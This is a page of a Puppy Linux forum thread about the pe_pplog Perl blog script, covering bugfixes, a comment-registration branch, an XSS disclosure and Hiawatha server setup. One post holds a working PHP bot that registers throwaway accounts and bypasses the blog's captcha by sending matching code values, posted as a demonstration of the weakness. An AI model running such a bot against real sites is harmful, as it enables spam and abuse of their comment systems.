Puppy Linux Discussion Forum Forum Index Puppy Linux Discussion Forum
Puppy HOME page : puppylinux.com
"THE" alternative forum : puppylinux.info
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

The time now is Mon 27 Feb 2017, 21:34
All times are UTC - 4
 Forum index » Advanced Topics » Additional Software (PETs, n' stuff) » Browsers and Internet
pe_pplog v2.1b bufixes!
Post new topic   Reply to topic View previous topic :: View next topic
Page 5 of 5 [75 Posts]   Goto page: Previous 1, 2, 3, 4, 5
Author Message
efiabruni

Joined: 18 Oct 2011
Posts: 69

PostPosted: Wed 04 Dec 2013, 14:55    Post subject: true  

will do that once I'm back from travelling

until then, all the other bugfixes and featured I described are in v2.1b.

I also put the blog up on github (username: efiabruni) feel free to play around Smile I'll be camping in Patagonia Very Happy
Back to top
View user's profile Send private message 
efiabruni

Joined: 18 Oct 2011
Posts: 69

PostPosted: Tue 10 Dec 2013, 08:57    Post subject: changes on github  

The last four days I spent on a ferry and had time to play with the pplog
I made following changes in the pe_pplog on github:

Added comment preview option for the admin page
Added the preview comment button on the preview comment page (now comment can be previewed again and again and again)
Added a check for double posts of comments

Changed files are: Pe_pplog.pl; pe_admin.pl and pe_Config.pl
Back to top
View user's profile Send private message 
BarryK
Puppy Master


Joined: 09 May 2005
Posts: 7984
Location: Perth, Western Australia

PostPosted: Fri 13 Dec 2013, 10:59    Post subject:  

efia,
I would appreciate your suggestions about what I should do.

I have been forced to disable comments on my blog, as someone has persisted in posting pornography comments.

I have been deleting them, but the person is persisting in posting more.

I was wondering how difficult it would be to implement email verification to register to post.

One way it could work, is when a user wants to post a comment, they first have to click a "Register" link. They provide their email address, to which their desired username and password are sent.

A log can be kept of usernames and email addresses, and the banning system can be expanded to ban users based on their email address.

Perhaps there are other ways of doing it.

_________________
http://barryk.org/news/
Back to top
View user's profile Send private message Visit poster's website 
anikin

Joined: 10 May 2012
Posts: 859

PostPosted: Fri 13 Dec 2013, 12:15    Post subject:  

Barry wrote:
Due to the moron named "Author", I have been forced to disable comments

That moron has many names: 'mafur', 'simargl13', 'simargl29' etc., He posted spam and pron on this forum too. Looks like he has a severe mental pathology and needs urgent medical attention.
Back to top
View user's profile Send private message 
efiabruni

Joined: 18 Oct 2011
Posts: 69

PostPosted: Fri 13 Dec 2013, 22:20    Post subject:  

Some people are depressingly destructive. I'm on holiday at the moment, but will look into it once I'm home. If someone has ideas, feel free to fork the blog on github!
Back to top
View user's profile Send private message 
efiabruni

Joined: 18 Oct 2011
Posts: 69

PostPosted: Sun 15 Dec 2013, 15:33    Post subject: branching out  

I created a branch called comment_registration on github.
In this I changed the pe_pplog.pl file to:
not accept comments from not registered users
send a new mail with registration request to the admin if a new user tries to post

The admin has to manually edit the useres.ppl.data file. The syntax is: username'encrypted password"username2'encrypted password2"...

This is a quick&ugly fix
Back to top
View user's profile Send private message 
efiabruni

Joined: 18 Oct 2011
Posts: 69

PostPosted: Mon 27 Jan 2014, 05:29    Post subject: comment registration  

I have updated the branch commen_registration on https://github.com/efiabruni/pe_pplog to make it possible for users to register and for the admin to block users.

I could not test it thoroughly as i don't have sendmail or similar. I use a simple regEx for email validation, this is not the most secure way to use sendmail, please use with care.

This will not be part of the official pe_pplog
Back to top
View user's profile Send private message 
gungsukma

Joined: 18 Sep 2011
Posts: 19

PostPosted: Fri 07 Feb 2014, 00:30    Post subject:  

Code:
I am bot   Posted on 7 Feb 2014, 12:09 by x6255
Barry should use REAL CAPTCHA.


I'm the one posted that on http://bkhome.org/news/?viewDetailed=00055

This is the script I have used (I used PHP, but it will be easy to be converted to other language).

Code:
<?php
set_time_limit(100);

// Random username
$random = 'x'.rand(1000, 9999);
echo "Your username: $random<br/>";

// Make email adress
file_get_contents("http://opentrashbox.org/mailbox.php?email=$random");
echo "Your email: $random@opentrashbox.org<br/>";

// Register to Barry's blog, Wait for email
file_get_contents("http://bkhome.org/news/?do=register&username=$random&email=$random@opentrashbox.org&originalCode=AAAAAAAA&code=AAAAAAAA&process=register&Submit=Register");
sleep(30);

// Read inbox, Get the password
$contents = file_get_contents("http://opentrashbox.org/mailbox.php?email=$random");
preg_match("/password:\s*(\d+)/", $contents, $match);
$password = $match[1];
echo "Your password: $password<br/>";

// Add comment
file_get_contents("http://bkhome.org/news/?viewDetailed=00055&title=I+am+bot&author=$random&content=Barry+should+use+REAL+CAPTCHA.&originalCode=9999999&code=9999999&pass=$password&postTitle=Comments+are+back&sendComment=00055&Submit=Add+Comment");
echo "Barry should use *real captcha*.<br/>";


With that script, I can make and register random username and random email address. Someone blocks one, I'll make one (thanks, OpenTrashBox.org!).

But the one thing I want to show is the Security Code, you can trick it!
On the script, I don't even bother to read the security code, I just need to change the value of form element originalCode and code, then I can bypass the security code. These parts:
> originalCode=AAAAAAAA&code=AAAAAAAA
> originalCode=9999999&code=9999999

This is my suggestion:
- Just accept email register from GMail.com and Yahoo.com or any reputable email service
- Check the pattern of username of email address, just accept alphanumeric, dots, and underscore.
- For GMail, remove all dots and label in the email username (gungsukma@gmail.com, g.ung.suk.ma@gmail.com, gungsukma+bla.bla@gmail.com are all the same user).
- Use REAL CAPTCHA when register and add comment
- Disable the comment on the blog now, I have leaked the bot source code. Twisted Evil

Oh, "gungsukma@gmail.com" is not mine
Back to top
View user's profile Send private message 
efiabruni

Joined: 18 Oct 2011
Posts: 69

PostPosted: Wed 12 Feb 2014, 16:45    Post subject: re: bots  

I am aware that the captcha is suboptimal, therefore there is also the "security question" option, which does not suffer from the same vulnerability and could even be set as a password.

Changes to comment_registration:
added disposable email services to block list by default
stricter rules for email validation

comment registration is never going to be an official feature, if someone feels like playing around with it, the code is on github on the branch comment_registration.
I simply do not have enough interest in this particular problem to muck around with it. I rather create galleries and css animations and stuff Smile

Again, the easiest and safest way is to use the security question as a password and only give the answer to people you trust. If it is broken into, change it.

Also, before someone got a personal grudge and went out of his way to post spam, no bot got past the former security features of the pplog for the past 2 years that I have been using it, nor was it a problem for Barry until now.
Back to top
View user's profile Send private message 
efiabruni

Joined: 18 Oct 2011
Posts: 69

PostPosted: Tue 01 Apr 2014, 05:18    Post subject: security issue  

There is a security issue with having bbcode enabled in comments in all the pplogs (original, SJPPlog and this one)

Due to very admissive parsing of the bbcode it is possible to insert javascript in comments when posting a link or a picture.
See http://tine.pagekite.me/pe_pplog.pl/?viewDetailed=00047 for an example. This makes comments vulnerable to xss attacks.

My advise is to disable bbcode on the comments of ALL versions of the PPLOG

What is needed:
URL / SRC validating and escaping
strict rules for which attributes are allowed, validating and escaping
additional html escaping

I will fix this properly in the coming weeks
Back to top
View user's profile Send private message 
pagestep007

Joined: 13 Jan 2015
Posts: 16
Location: colombia

PostPosted: Mon 02 Jan 2017, 15:01    Post subject: pe_pplog v2.1b
Subject description: 64bit ?
 

Hi,
I am trying out the slacko6.3 64 bit version puppy. Noticed it did not have pplog, then tried all sorts of things , the pe_pplog on this thread I managed to get working on the 32 bit slacko6.3. but....not on the 64 bit. I notice this thread's last entry was 2014,Maybe the program has not been upgraded ...is pe_pplog 64 bit compatible?
Thanks.
Back to top
View user's profile Send private message 
OscarTalks


Joined: 05 Feb 2012
Posts: 1453
Location: London, England

PostPosted: Wed 11 Jan 2017, 23:15    Post subject:  

I looked into this and the problem seems to be that hiawatha in Slacko64 is reading the config file in /usr/etc/hiawatha rather than the one in /etc/hiawatha
See this post:-
http://murga-linux.com/puppy/viewtopic.php?t=109299&start=10
So long as you are aware of this you can configure it and get it working.

_________________
Oscar in England

Back to top
View user's profile Send private message 
pagestep007

Joined: 13 Jan 2015
Posts: 16
Location: colombia

PostPosted: Thu 12 Jan 2017, 10:05    Post subject: pe_pplog v2.1b bufixes!
Subject description: pup_pplog in slacko6.3 64bit
 

EXCELLENT ! Thank you.
I installed pplog- 1.1.3.pet and then pasted the following into the config file in usr/etc/hiawatha, and it all suddenly worked.



ServerId = webuser
ConnectionsTotal = 150
ConnectionsPerIP = 10
SystemLogfile = /var/log/hiawatha/system.log
GarbageLogfile = /var/log/hiawatha/garbage.log

Binding {
Port = 80
# Interface = 127.0.0.1
}
Hostname = 127.0.0.1
WebsiteRoot = /root/Web-Server
StartFile = index.html
AccessLogfile = /var/log/hiawatha/access.log
ErrorLogfile = /var/log/hiawatha/error.log

#add this stuff to get a perl script working (pplog)...
#QUISP has a binary executable CGI named 'quisp.bin'...
MimetypeConfig = /etc/mime.types
#CGIhandler = /usr/bin/perl:pl
CGIextension = pl,bin
ExecuteCGI = yes
#QUISP puts %0D, %0A (carriage-return, line-feed) chars in the url
#(v128), to allow chars below ascii 32 need this...
SecureURL = no


I did not get any joy yet with pe_pplog nor sjpplog but will give them a go. I like pup_pplog, as it has the menu entry and starts Hiawatha from there. Thank you once again.
Back to top
View user's profile Send private message 
OscarTalks


Joined: 05 Feb 2012
Posts: 1453
Location: London, England

PostPosted: Thu 12 Jan 2017, 13:33    Post subject: Re: pe_pplog v2.1b bufixes!
Subject description: pup_pplog in slacko6.3 64bit
 

pagestep007 wrote:
I did not get any joy yet with pe_pplog nor sjpplog but will give them a go. I like pup_pplog, as it has the menu entry and starts Hiawatha from there.

If you have the original pup_pplog installed and working you can easily substitute pe_pplog (which I presume is more advanced).

Install the .pet from the first post of this thread (hiawatha version of course).
Locate the file /usr/sbin/pplog_gui
Right click and open it as text.
Edit the line near the bottom so it reads:-
exec defaulthtmlviewer http://127.0.0.1:80/pe_pplog.pl
(the original line would be exec defaulthtmlviewer http://127.0.0.1:80/blog/pup_pplog.pl)
Save and close
The usual menu entry will then start and stop hiawatha as before
but the pplog button will launch pe_pplog instead of pup_pplog
pe_pplog-wheezy.jpg
 Description   Easy substitution of pe_pplog in place of pup_pplog
 Filesize   38.34 KB
 Viewed   22 Time(s)

pe_pplog-wheezy.jpg


_________________
Oscar in England

Back to top
View user's profile Send private message 
pagestep007

Joined: 13 Jan 2015
Posts: 16
Location: colombia

PostPosted: Thu 12 Jan 2017, 21:07    Post subject: pe_pplog v2.1b bufixes
Subject description: pe_pplog v2.1b in Slacko 6,3 64bit
 

YES INDEED, it worked wonderfully. Thank you.
As I am still on a fresh live CD, remastered onto a USB memory stick, I needed to first install pup_pplog, then do the config subtitution to get pup_pplog going, then changed the /usr/sbin/pplog_gui as you instructed. Works well. I will now remaster to another USB.

(a big thank you to all puppy people --maybe not the right thread to write in but ...)
By the way... I am a TV and Cine producer. My entire pipeline can be done from my slacko5.7- 32 bit CD, with a combo of open source programs on it. I can use it right from the disk anywhere on any machine. A few extra programs are stored elsewhere handy to install quickly when needed. The great thing is Puppy does not hog resources and just about everything goes to getting work done. I am using Pentium 4 comps, and some laptops to render on, with the fastest comp a duo core, and with Puppy, even 4K video is possible on these old machines. Blender 2.76b works faster on the 64 bit puppy, so now I am using the slacko6.3 64bit version for special effects processing. Not all my combo of programs work on the 64 bit system, but we will chip away at that one. (the 32 bit combo took about a year to get working well). So a HUGE thanks to all puppy people for your help in keeping us working.kudos to you all.
Back to top
View user's profile Send private message 
Display posts from previous:   Sort by:   
Page 5 of 5 [75 Posts]   Goto page: Previous 1, 2, 3, 4, 5
Post new topic   Reply to topic View previous topic :: View next topic
 Forum index » Advanced Topics » Additional Software (PETs, n' stuff) » Browsers and Internet
Jump to:  

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group
[ Time: 0.0887s ][ Queries: 13 (0.0081s) ][ GZIP on ]